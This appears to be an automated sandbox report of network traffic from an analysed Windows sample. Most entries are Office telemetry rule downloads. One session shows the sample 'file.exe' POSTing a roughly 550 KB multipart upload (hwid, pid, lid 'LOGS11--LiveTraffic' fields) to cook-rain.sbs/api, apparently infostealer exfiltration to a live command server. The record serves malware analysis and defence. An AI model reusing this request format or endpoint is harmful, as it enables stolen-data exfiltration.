                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      31192.168.2.74973513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:35 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                      x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164135Z-r1d97b99577ndm4rhC1TEBf0ps00000009a000000000497c
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      32192.168.2.749737104.21.66.384437476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=N9NKF5AK
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 550115
                                                                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: 2d 2d 4e 39 4e 4b 46 35 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 32 32 38 38 35 46 32 31 41 36 46 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4e 39 4e 4b 46 35 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 39 4e 4b 46 35 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4e 39 4e 4b 46 35 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                                      Data Ascii: --N9NKF5AKContent-Disposition: form-data; name="hwid"F5D22885F21A6F1063CFCF7E6C45F838--N9NKF5AKContent-Disposition: form-data; name="pid"1--N9NKF5AKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--N9NKF5AKContent-Di
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: 88 d3 f4 b9 77 5a a7 a1 89 5b 73 09 05 40 9e 0f 94 39 cc 41 cb 61 a5 e7 0e 60 5e a5 9b 3a 00 9c 38 4d b3 24 2e 2f f6 87 1c c6 1b dc aa d1 9e 84 c8 0c a9 2f 7a e6 a8 d0 e5 eb dd b7 b4 45 3b 42 89 11 e1 52 50 71 2c 05 a5 db 8c 1b 77 30 6f cb 20 e7 c9 81 eb 2b 66 d2 e1 07 34 f9 1a ae 05 f0 b0 c8 31 43 77 85 06 43 cb bb 51 55 e6 03 66 e9 15 96 f8 e6 31 19 43 e9 d5 7f d1 c4 d4 10 bd cd b2 fd 7b 25 ff 2e db 42 fe b6 b1 a9 ae 8b d4 48 f7 18 9e 1d b8 bb ca 69 28 4a e5 eb 2c e2 d2 c8 f5 ad c8 65 87 0d e5 01 a1 f9 e3 6e 33 07 c0 25 a3 b4 88 b0 a4 49 f1 e7 02 99 8b f1 ca 7a 72 1a 9c 26 0d aa ee ec 91 0e e3 c3 0e 5c 97 82 86 01 a6 d8 b8 bb 12 39 ff 5f 59 8c 5f 7c 7d d8 ce 51 37 95 16 8d 83 ce 06 2f 5a 50 1f f5 0f c9 f0 9c 1f 51 d1 8f 6f 08 50 6b 35 e1 a3 e4 c5 66 2e
                                                                                                                                                                                                                      Data Ascii: wZ[s@9Aa`^:8M$.//zE;BRPq,w0o +f41CwCQUf1C{%.BHi(J,en3%Izr&\9_Y_|}Q7/ZPQoPk5f.
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: b9 ef 1c 9e 5d 3c 00 02 8a 73 fc aa 57 2d 83 ac b7 eb d5 35 6e 77 ed 41 f4 05 0f 57 14 3c f9 5c 1f 76 15 f5 f2 91 0d df af 95 be 16 3e fe 59 af d7 64 d9 c8 bd a7 b2 5d 19 e3 3d 7b 7c 8f 98 27 87 48 09 bc 56 92 50 7a c8 e3 d4 9f db 42 e8 98 ec 34 30 5f 62 20 6a 19 bd 76 f2 d5 d7 6a 9d 65 93 e4 50 35 b3 34 97 1d 7b 8f 44 eb 91 2c 43 38 fa 64 32 36 0d 6f 1c a9 30 af 56 fe d0 3d 0a 08 39 95 a7 a6 09 b1 4a 85 7e 56 7b 6c 47 68 32 d1 93 f7 34 42 a9 4f e0 1e 3b 21 e9 d5 9f 9f 5f d6 f2 72 cc 65 be 7b ab 3e 83 c5 ef d9 af 02 a1 17 82 49 e2 39 0d 72 c5 5a 32 f9 5d fe 6d ec d0 3c 71 a3 01 05 25 0c 15 89 d9 81 21 1a 0b cd 4f 09 ee fe 98 ae 40 3c 6f 2d 76 df f1 b8 ea 24 df b5 49 da 8b fd af ae cf a7 7a 62 fb 7a 83 a3 f0 c7 fb 88 32 bb 6a e8 d8 19 cb 1a e7 35 92 2d 79
                                                                                                                                                                                                                      Data Ascii: ]<sW-5nwAW<\v>Yd]={|'HVPzB40_b jvjeP54{D,C8d26o0V=9J~V{lGh24BO;!_re{>I9rZ2]m<q%!O@<o-v$Izbz2j5-y
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: f0 05 fe a8 e2 5e 41 fb fc 5d c9 1e 8f 44 21 56 5a cb cf 90 1f 1a 9f df 38 85 7c 43 7f d9 73 91 07 de 5f 04 ba d0 b0 37 eb 6b 0a 1c 5d 2e 00 31 ff c9 38 0c b4 c7 4a ea d1 0d ca e0 85 a8 95 6b d5 e9 71 c5 79 2d 40 7b 1f 54 60 cc f8 80 12 36 0d 9b c4 5c 1a 4d 02 89 1a a8 90 04 5b b9 8e c0 d1 ac eb 4d a7 4f 54 bf 1f 5f 38 ee 2c d0 a5 3d 5c 7a ab bb 9a 34 f7 5b 86 ae 78 59 b9 ea 56 de 32 d7 45 d0 28 2c 01 0b bb 0a 9a 18 35 b0 bd 09 df 00 a9 33 63 c0 64 0c fb 47 4e 5f ab 9d f2 ac a0 94 ff f3 6d d7 df 8c cf 4a 9c 7b 8f a9 72 df c5 e2 94 c7 79 de 4c b7 1a 53 28 c6 da 58 88 eb e9 13 53 8a 9a fe cc 2a 69 71 9b d1 bd 77 cc 45 03 15 7c 4a ca bc 5e d1 0d 88 a0 c6 2e 93 1e e8 84 cb fc f9 58 90 90 98 f0 de a9 2c 30 43 3e 28 c0 10 97 78 8a 81 a1 3b 1f cd d8 b7 66 a5 e5
                                                                                                                                                                                                                      Data Ascii: ^A]D!VZ8|Cs_7k].18Jkqy-@{T`6\M[MOT_8,=\z4[xYV2E(,53cdGN_mJ{ryLS(XS*iqwE|J^.X,0C>(x;f
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: 54 c8 9c cf 60 44 45 67 bd 8b d4 9f 45 a9 dd a9 c5 ff f1 b7 da 7b a4 ca a0 ff 4d c8 24 60 be 3b 35 71 2f ce e7 05 dd 3e 22 13 b7 01 97 b8 c4 5f af 4a 9c 16 fa 50 08 a4 79 eb 1e 15 14 6c 0c f9 5b d8 17 fa f2 f4 97 6b b3 8b c0 31 87 f0 38 f6 87 95 48 92 55 97 a7 5f f2 bc 86 8c a7 6b 2d fb f3 b2 65 fc bc e5 dd aa a6 7d b2 fd 61 d3 51 52 da a9 52 e8 8c 7f b5 4a 58 d8 58 ad 74 7c 49 cc cd 84 f8 b9 e0 81 18 ad 12 4d fb 8b f5 4a df 42 12 7a 2d 5b 2e d3 49 46 e9 a6 91 fd 1c 9f 45 72 cd 88 d6 15 97 6a 00 47 45 83 d0 a8 70 87 af 8a bb 79 9a 3c 96 d1 81 bb 7c a1 f6 c2 92 9b e4 8e 9d 04 68 55 b8 f3 7d b7 09 e4 38 62 f0 a9 2c a4 da 48 17 e3 23 a4 1d 9b fe 3d 68 50 5e 70 87 88 c2 8f d3 e6 b6 39 5e 0c 04 98 2e 6f e5 9a 58 39 d0 a6 56 ad bb dd dc d0 3f 7e b9 dd 33 d0 d6
                                                                                                                                                                                                                      Data Ascii: T`DEgE{M$`;5q/>"_JPyl[k18HU_k-e}aQRRJXXt|IMJBz-[.IFErjGEpy<|hU}8b,H#=hP^p9^.oX9V?~3
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: fb 0f 65 a1 d7 33 62 a2 f5 44 36 86 13 b5 52 75 5b 2a bd 5e 5f d1 46 d9 1b c5 cb 16 ff be 56 8c 66 54 ac fc ab 55 3e a6 0b 66 24 51 2d 48 81 bb 0b 12 44 81 0a eb be c1 60 85 f6 db 36 2d 59 49 6e 67 a3 e1 5b bb 41 ee ac 39 c8 30 2e 0f df 51 f3 64 6f c1 c3 a8 15 14 78 ad 0f 6c 25 78 e7 3e 89 97 9c 6c ce 27 cf 77 ac db dd 00 56 46 8e 6a f3 0f b7 87 15 9d 65 76 ad 0f b7 5b 1c 45 e5 02 6f dd 8b f0 32 c8 c0 86 47 85 5e c6 2a 62 42 3a fb b3 a7 8f 27 16 4c e5 56 5a ed ec de 4a 69 35 ec c4 6e 4c ac 5b 6b 65 e8 42 3f 05 62 6d 6f e0 97 7e ad df c0 8b 95 4a c3 87 18 85 54 cb 4c 52 55 fa c0 45 3c 3e 89 d4 35 b4 59 08 88 11 a2 6d b3 2f 77 80 d1 f2 6a 32 3f 90 fe d3 7c 2c d0 5a 55 7b 5a 78 9c af 43 03 09 9b 0b fd 05 7a 44 88 db f3 dc d4 8f f0 13 49 05 1b 48 22 a2 f3 98
                                                                                                                                                                                                                      Data Ascii: e3bD6Ru[*^_FVfTU>f$Q-HD`6-YIng[A90.Qdoxl%x>l'wVFjev[Eo2G^*bB:'LVZJi5nL[keB?bmo~JTLRUE<>5Ym/wj2?|,ZU{ZxCzDIH"
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: 58 6f 2f c1 00 31 a8 27 cb 5f d1 8e ab b7 b6 f6 1c c9 c2 79 8a c7 f5 fe 0a 29 56 5a 54 f6 67 f5 8c 0b 7b 82 bf 2b 60 70 a1 75 24 e8 5a b7 05 11 bd ff 92 24 b6 a9 b9 ee dd af ed 34 6f 85 2d 0c fc 02 f4 dc ed 71 29 bd 49 d6 56 d3 f7 e2 14 4e d2 37 52 ea 23 67 ff 63 43 a4 c2 f0 54 05 90 70 92 fa 27 7f fa b5 a7 e7 20 85 a4 e3 3e f6 84 c6 ad cf a7 67 95 38 fd 0d 55 e6 df c1 b6 26 60 ad 87 53 ff 1b ef 7c 67 2f 78 7f c5 6e ef 5f 59 ea fb 98 fd d9 ff c4 3c bb 76 a7 21 e4 cc 93 f8 c8 2f df 8d 56 de 9e cc 4f d6 11 75 0d ed 97 ba 59 7a 3c 61 a1 91 4c 59 34 bd bd be eb c8 9e db a7 0d f3 e2 29 81 d5 1a 59 e4 d7 72 e1 97 f2 08 7b da 6d 93 f2 90 b1 7d 81 c1 c1 48 09 f9 c9 a3 71 1a cd a4 82 dd b2 ee ff 1b 07 d7 0e d1 de a2 89 25 b0 35 87 54 53 e0 b7 5d 30 c5 df a3 03 d6
                                                                                                                                                                                                                      Data Ascii: Xo/1'_y)VZTg{+`pu$Z$4o-q)IVN7R#gcCTp' >g8U&`S|g/xn_Y<v!/VOuYz<aLY4)Yr{m}Hq%5TS]0
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: 4f 65 03 42 07 46 17 56 dd 2c 63 97 71 50 ac 0c d4 ee 83 5e c2 48 db 87 c9 7b e5 a4 72 04 30 f3 21 ed 30 da 25 14 ba 3f 18 61 54 1c 7a 07 16 5e b0 e9 a3 a4 f5 f2 0a 36 0f 49 c9 a6 13 76 83 22 40 3a b3 20 4f b6 37 14 a1 7f 9a 0f bd 25 10 3e 07 da 0c 50 d6 3d 16 41 d4 42 05 92 a7 f2 90 dc 9b c3 1f 60 f8 fb 48 b2 24 4c 54 fa 95 ad 6e 9f a4 9f 93 e9 ba 62 1f 33 19 15 ae e4 3a 77 d4 e2 7a ae 9c 45 6f 2e 6e 80 13 f8 e0 e9 a2 90 6f 44 80 62 b0 1d 26 27 32 4d 2f dd a3 72 cb ec fb 07 43 f3 e8 78 59 f6 60 55 af d9 65 ae ab 7d 87 e8 a9 ff 3d 8d 6c f7 c5 d2 ef a0 f4 56 e8 87 58 d5 35 87 65 c3 d9 51 19 d3 c9 be 80 21 8e 4c 90 b0 11 ca a5 85 a9 a3 8c cd 8e 47 44 a4 a0 7d 05 8c 8c 00 2e 24 8a 57 be 57 88 ba 9b 76 e4 68 dc 0c ec 27 0b 6f 6a ad 1b c3 1f 8c 78 3a 91 f6 44
                                                                                                                                                                                                                      Data Ascii: OeBFV,cqP^H{r0!0%?aTz^6Iv"@: O7%>P=AB`H$LTnb3:wzEo.noDb&'2M/rCxY`Ue}=lVX5eQ!LGD}.$WWvh'ojx:D
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: b2 b5 3b 66 bf 76 d7 ef 67 b1 18 f5 6d 21 27 20 74 9d ce 52 09 73 20 8d ff 5e d1 68 f6 f1 45 9b 17 55 64 a0 8f 9f 04 08 45 9c 8b af a5 f3 71 1a 1e c6 60 fa 51 35 c1 db 9c 90 04 ce 44 09 31 15 ca de e5 18 d1 7c af 63 59 14 f8 85 0d fa fe b5 08 7e 89 03 0d dc aa 10 d0 9d 05 bd bd c0 0e 4a 43 30 95 50 d9 08 58 cc 9b 77 c6 50 a8 14 0d a7 f4 46 94 21 c8 58 36 80 bf bc ff d7 87 71 14 60 5b 32 1e 30 ef fc 82 d9 25 e7 63 11 03 9d 67 d1 35 a5 fa 30 f3 9f f8 7e d5 03 db ad 75 ad 0d 0c 20 ee cc 34 16 fc fc 66 e5 20 3b 02 fe eb 25 cb 44 32 34 0f b8 d5 18 16 12 21 ca 61 89 99 6b 27 ac 8d 41 fd 98 ee 0b 35 47 c1 2f fa 3e c2 47 46 40 a8 0f 38 30 55 fa 68 20 30 19 ed 70 53 48 bb 09 31 16 95 c4 60 9a 9a 36 e8 9d d7 ae 62 0b 13 62 c4 8b 3f a0 78 c4 ec c1 f3 c6 94 e3 88 50
                                                                                                                                                                                                                      Data Ascii: ;fvgm!' tRs ^hEUdEq`Q5D1|cY~JC0PXwPF!X6q`[20%cg50~u 4f ;%D24!ak'A5G/>GF@80Uh 0pSH1`6bb?xP
                                                                                                                                                                                                                      2024-11-20 16:41:36 UTC15331OUTData Raw: f1 6f 79 85 8f 01 f3 c1 56 55 e5 26 87 39 f7 14 f8 21 04 cb cc f9 e1 38 53 c9 95 ef 9f c2 22 1b 46 50 a5 63 30 55 1f 24 10 18 3b 11 c9 f7 08 9d 97 3b 54 9d 68 dd 40 a9 43 0c 9c 0e a0 48 eb 9e 06 d6 3f e3 cf 4f 5e 8f 9d 3d c4 56 45 ad 0a 04 9b 23 4d 06 71 dd 83 81 30 3b 14 2a bd 7a 0d 65 20 bb bc 15 5b 63 d6 4b b7 8b 95 0e 36 b0 b7 74 d3 b9 c2 0e ca 14 7c 9f b9 aa b9 ca a0 ea 57 53 27 0d d0 7e 8e ee bb f8 ce 77 46 55 19 76 50 e5 b7 e4 22 b7 88 fa 80 71 c2 52 b0 ef 9c 79 11 e6 37 52 ce f3 0e fb 90 04 4f 9a d9 52 fd 0d e9 25 26 42 9c 4b ef 41 ce 45 d4 8a 97 ab 93 49 08 73 04 39 ee 8f 64 fb 0e c2 27 f1 f2 9d f3 9e 4d 6b 75 b3 e3 cd f9 c0 5b e9 ab 9a 04 76 27 f8 7d 8c b9 59 e1 4b ed cf c1 b0 9e e1 5a c9 df 6e 4a 49 84 96 26 a1 2d bf b3 a6 c3 2c af c5 cd b2 34
                                                                                                                                                                                                                      Data Ascii: oyVU&9!8S"FPc0U$;;Th@CH?O^=VE#Mq0;*ze [cK6t|WS'~wFUvP"qRy7ROR%&BKAEIs9d'Mku[v'}YKZnJI&-,4
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC990INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:40 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=ki5ehc78mt1q0b1ib1b3nnlpid; expires=Sun, 16-Mar-2025 10:28:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B3hsi%2Fy1FgrNeDTeM1meoLo6SsxWVYjvu%2BY0n1Mql5CqnE0OEC9SSx%2F7mpSE73clBpQMHDYvYwDoLEkkxTfxf3FSuSsCNANXMgehad2miHY9yz3MQd2tylyCORLTQi6X"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8e59e3754f3843c8-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1621&sent=321&recv=553&lost=0&retrans=0&sent_bytes=2830&recv_bytes=552583&delivery_rate=1763285&cwnd=191&unsent_bytes=0&cid=4255baf416c3940c&ts=4135&x=0"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      33192.168.2.74974113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:37 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:38 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                      x-ms-request-id: 7f65af6f-801e-0067-5f8c-3afe30000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164138Z-185f5d8b95cx9g8lhC1NYCtgvc00000002v000000000k9ah
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      34192.168.2.74974213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:37 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:38 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                      x-ms-request-id: c6b0c23f-801e-0048-738c-3af3fb000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164138Z-185f5d8b95c5lcmhhC1NYCsnsw0000000ap0000000001trr
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      35192.168.2.74974013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:37 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:38 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
